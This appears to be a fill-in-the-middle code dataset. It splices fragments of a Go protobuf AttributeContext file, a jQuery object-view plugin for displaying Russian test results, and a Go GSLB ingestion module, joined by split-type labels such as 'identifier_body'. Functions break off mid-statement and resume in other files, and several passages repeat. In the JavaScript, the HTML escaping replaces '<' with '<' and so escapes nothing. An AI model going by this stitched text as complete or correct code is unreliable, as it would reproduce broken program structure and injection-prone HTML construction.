// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
| GetMetadataContext | identifier_name |
|
attribute_context.pb.go | (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) |
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m * | {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
} | identifier_body |
1602.object_view.js | ?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Recursively compute the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Mark the node as "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Bail out if nothing has actually changed
if(tag !='select' && el.defaultValue==el.value)return;
// Walk down to the target object and its value
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Store the new value in the object
el.defaultValue = el.value;
obj[last] = el.value;
// Update the parent row (if there is one)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // found the table row that holds the parent
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'%';}
},
questions: {
label: 'Вопросы темы',
className: 'testQuestion',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection:{
index: function(i,val){
return 'Тема №'+(Number(i)+1);
},
value: function(val){
return '<b>'+this.themeName+'</b> (отвечено верно <b style="color:blue">'+this.correctAns+'</b> из '+this.questCount+')';
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testQuestion = {
members:{
answers:{
label: 'Ответы',
className: 'testAnswer',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Вопрос '+(Number(i)+1);
},
value: function(val){
if(globals.godMode){
var correct = true;
for(var j in this.answers)if(this.answers[j].isCorrect!=this.answers[j].userAnswer)correct = false;
return '<span style="font-weight:700;color:'+(correct?'green':'red')+'">'+this.content+'</span>';
}else{
return this.content;
}
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testAnswer = {
members:{},
collection:{
index: function(i,val){
console.log(this);
return '<input type="'+(this.t==1?'radio':'checkbox')+'" disabled '+(this.userAnswer===1?'checked':'')+' />';
},
value: function(val){
return this.content+(globals.godMode && this.isCorrect===1?' <b style="color:green;">(правильный ответ)</b>':'');
},
defaultExpanded: false,
expandable: false
}
}
/* }}} */
/*
Function: objectView
*jQuery-plugin* for displaying an object
Parameters:
obj - Object to display
className - *string* Class name
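 Example (assumed container element and data variable):
 > $('#report').objectView(userTestingData, 'userTesting');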
*/
$.fn.objectView = function(obj,className){/* {{{ */
var path;
if(typeof obj == 'string')
path = obj.split('.'); // we assume a key can never contain a dot
else
path = [];
var level = path.length;
if(level==0){
var ovid = this.attr('ovid');
if(!ovid){
ovid = $.ov.views.length;
this.attr('ovid',ovid);
$.ov.views.push({
object:obj,
expanded:[]
});
}else{
$.ov.views[ovid].object = obj;
$.ov.views[ovid].expanded = [];
}
}else{
var tmp = this;
var tmp2;
ovid = this[0].parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
if(this.attr('expanded')==1){
var curlevel = this.attr('level');
tmp = tmp.next('tr');
while(true){
if(tmp.attr('level')<=curlevel || tmp.size()==0)break;
tmp2 = tmp.next('tr');
tmp.remove();
tmp = tmp2;
}
this.attr('expanded',0);
var pathStr = path.join('.');
var exp = $.ov.views[ovid].expanded;
for(var i in exp)if(exp[i]==pathStr)delete exp[i];
return this;
}
this.attr('expanded',1);
obj = $.ov.views[ovid];
}
var r = $.ov.objectToRows(ovid,path,className);
if(level == 0){
if(this.children('table.objectView').size()==0)
this.html('<table class="objectView" cellspacing="0"><thead><tr><th colspan="Object View"></th></tr></thead><tbody></tbody></table>');
var tbody = this.children('table.objectView tbody');
tbody.html(r);
}else{
this.after(r);
}
/* }}} */
}
$.fn.objectXView = function(obj,className){
if(!$.ov.classes[className])return false;
| var cs = $.ov.classes[className].collections;
| random_line_split |
|
1602.object_view.js | x == 'object' && typeof mem.editing != 'object')
)
){ // Edit
var type = (mem.editing&&mem.editing.type)?mem.editing.type:mem.editing;
switch(type){
case 'textarea':
value = '<textarea path="'+newPathStr+'" rows="'+(mem.editing&&mem.editing.rows?mem.editing.rows:3)+'" onblur="$.ov.saveValue(this);">'+String(x).replace(/</g,'<')+'</textarea>';
break;
case 'password':
case 'text':
default:
value = '<input type="'+(type=='password'?type:'text')+'" path="'+newPathStr+'" value="'+String(x).replace(/\"/g,'"').replace(/[\n\r]/,"")+'" onblur="$.ov.saveValue(this);" />';
break;
case 'select':
var opts = '';
for(var i in mem.editing.opts){
opts+='<option '+(x==mem.editing.opts[i]?'selected':'')+'>'+mem.editing.opts[i]+'</option>';
}
value = '<select path="'+newPathStr+'" onchange="$.ov.saveValue(this);">'+opts+'</select>';
break;
}
}else{ // Readonly
var c = $.ov.classes[mem.className];
if(typeof mem.asString == 'function'){
value = mem.asString.apply(obj,[x]);
}else if(c){
if(c.collection && typeof c.collection.value == 'function')
value = $.ov.cl | ',\''+mem.className+'\'':'')+')"';
var is_levelup = false;
if(typeof x == 'object')for(var xxx in x){is_levelup = true; break;}
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || mem.defaultExpanded);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(mem.className?'iclass="'+mem.className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+value+'</td></tr>';
// Recursively compute the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),mem.className);
}
}else{ // no class description was found, or the object is a collection
for(var i in obj){
try{
var x = obj[i];
}catch(e){
continue;
}
var defExp = false;
if(cl && isCollection){
var vis = cl.collection.visible;
if(typeof vis == 'function' && !vis(i,obj[i]))continue;
var label = typeof cl.collection.index == 'function'?cl.collection.index.apply(obj[i],[i,obj[i]]):i;
var val = typeof cl.collection.value == 'function'?cl.collection.value.apply(obj[i]):obj[i];
var is_levelup = (typeof cl.collection.expandable == 'undefined' && typeof x == 'object')?true:!!cl.collection.expandable;
defExp = !!cl.collection.defaultExpanded;
}else{
var label = i;
var val = this.objectMemberValue(x);
var is_levelup = false;
if(typeof x != 'string')for(var xxx in x){is_levelup = true; break;}
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var levelup = ' onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(cl?',\''+className+'\'':'')+')"';
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || defExp);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Recursively compute the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Mark the node as "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Bail out if nothing has actually changed
if(tag !='select' && el.defaultValue==el.value)return;
// Walk down to the target object and its value
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Store the new value in the object
el.defaultValue = el.value;
obj[last] = el.value;
// Update the parent row (if there is one)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // found the table row that holds the parent
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'% | asses[mem.className].collection.value.apply(x);
}
}
if(typeof mem == 'string'){
label = mem;
}else if(typeof mem == 'object' && mem.label){
label = mem.label;
}
var levelup = 'class="likealink" onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(mem.className? | conditional_block |
dq_ingestion.go | Name, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occurred while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) | gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "received delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
| {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname) | identifier_body |
dq_ingestion.go | store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
